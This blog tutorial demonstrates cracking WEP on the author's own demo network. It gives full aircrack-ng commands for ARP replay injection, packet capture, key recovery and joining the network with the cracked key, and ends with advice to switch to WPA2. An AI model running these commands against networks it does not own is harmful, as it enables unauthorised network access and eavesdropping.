Wireless WEP (in)security

Wireless security has been a great concern for the IT security professionals from at least a decade. It is difficult to protect something that you can’t see, that goes through walls and that everyone close enough can eavesdrop, especially when the only wifi security in place is the deprecated wireless encryption protocol WEP. In this article we will break the wireless security of a demo network and we will obtain the wep key. We will use arp injection in order to facilitate this so called wep crack and we will do that so fast, that from now on you will always have second thoughts about wifi security.


To illustrate the scenario we will use an old Linksys wireless PCMCIA network card and we will break into a specially created for the purpose wireless network called SoulReaver, which we have configured on a Linksys wireless router. The laptop on which the potential malicious activities will be performed is preinstalled with BackTrack and we will use an arp injection technique to speed up the demonstration.

Once the operating system has booted, insert the card in the PCMCIA slot and you should see the following line in dmesg:

b43-phy0: Broadcom 4306 WLAN found

This means that the card has been successfully detected. Next we need to put the card in monitoring mode, so we can have a look around. This is achieved with the following command:

# airmon-ng start wlan0
# airodump-ng wlan0

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1A:70:FD:3A:76  -41        5       11    0   6  54e  WEP  WEP         SoulReaver

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 (not associated)   00:1D:E0:82:80:31  -74    0 - 1      3        4
 00:1A:70:FD:3A:76  00:21:5D:13:FE:56  -45   54e-54e    45       12

So there we see a wireless network called “SoulReaver” which is protected with WEP. At this point we just fire up a packet sniffer and wait for enough packets to be collected in order to crack the WEP key, but as we want to speed up the process we will use an ARP injection technique to collect more packets faster. In order for arp injection to work, in most cases you will need to first associate with the access point:

# aireplay-ng -1 0 -e SoulReaver -a 00:1A:70:FD:3A:76 -h 00:12:17:07:E0:15 wlan0

Then we can start to sniff for ARP packets and start injecting once we have captured at least one:

#  aireplay-ng -3 -e SoulReaver -a 00:1A:70:FD:3A:76 -h 00:12:17:07:E0:15 -x 200 wlan0
16:06:22  Waiting for beacon frame (ESSID: SoulReaver) on channel 6
Found BSSID "00:1A:70:FD:3A:76" to given ESSID "SoulReaver".
Saving ARP requests in replay_arp-0709-160622.cap
You should also start airodump-ng to capture replies.
Read 7803 packets (got 1 ARP requests and 1173 ACKs), sent 1222 packets...(199 pps)

The command above does the following – selects the third attack which is ARP injection, specifies that we will attack a wireless network called “SoulReaver” with MAC address of the access point “00:1A:70:FD:3A:76” and configures the packet injection rate with 200 packets per second. As we can see from the command output, aireplay-ng automatically discovers the source MAC address, locates the wireless network at channel 6 and waits for a valid ARP packet that can be used for injection. After such packet is captured, the tool starts sending packets at a rate of 199 packets per second, at which point we can start to dump the packets into a file:

# airodump-ng -c 6 --bssid 00:1A:70:FD:3A:76 -w SoulReaver-dump wlan0

The command above instructs airodump-ng to listen on channel 6 on interface wlan0 and to write the captured packets in a file called SoulReaver-dump-01.cap. After we have captured enough packets, we can try cracking the password with the following command:

# aircrack-ng -a 1 -n 64 SoulReaver-dump*.cap

We specify that we want to perform WEP cracking and that we want to try with 64 bit key first. If you have captured enough packets, after a short delay the following screen will appear:

                                     Aircrack-ng 1.0 rc3 r1552

                            [00:00:04] Tested 730859 keys (got 13883 IVs)

   KB    depth   byte(vote)
    0   22/ 32   F3(16384) 40(16128) 53(16128) 7D(16128) 93(16128) 97(16128) A2(16128)
    1    1/ 14   84(18944) AC(18432) FD(18432) 6E(17920) 5D(17664) B2(17664) 02(17664)
    2    0/ 12   0D(19968) 5D(19968) 25(18944) 7F(18688) A7(18688) 14(18688) 53(18176)
    3    4/ 10   86(18688) 62(18176) 97(18176) 38(17920) 4F(17664) 6D(17664) 1C(17408)
    4    1/ 14   52(19968) F9(19456) F0(18944) 9C(18688) B4(18176) FE(17920) 03(17664)

                         KEY FOUND! [ CB:74:0D:89:52 ]
	Decrypted correctly: 100%

In order to connect to the wireless network with the just cracked WEP key, do the following:

# iwconfig wlan0 mode manage
# ifconfig wlan0 down
# iwconfig wlan0 essid SoulReaver key CB:74:0D:89:52
# ifconfig wlan0 up
# dhcpcd wlan0
# ping www.google.com


The recommended solution to WEP security problems is to switch to WPA2 or with older equipment the less resource intensive WPA. Either is much more secure than WEP. To add support for WPA or WPA2, some old Wi-Fi access points might need to be replaced or have their firmware upgraded. WPA was designed as an interim software-implementable solution for WEP that could forestall immediate deployment of new hardware. However, TKIP (the basis of WPA) has reached the end of its designed lifetime and has been deprecated in the next full release of the 802.11 standard.

Leave a Reply

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>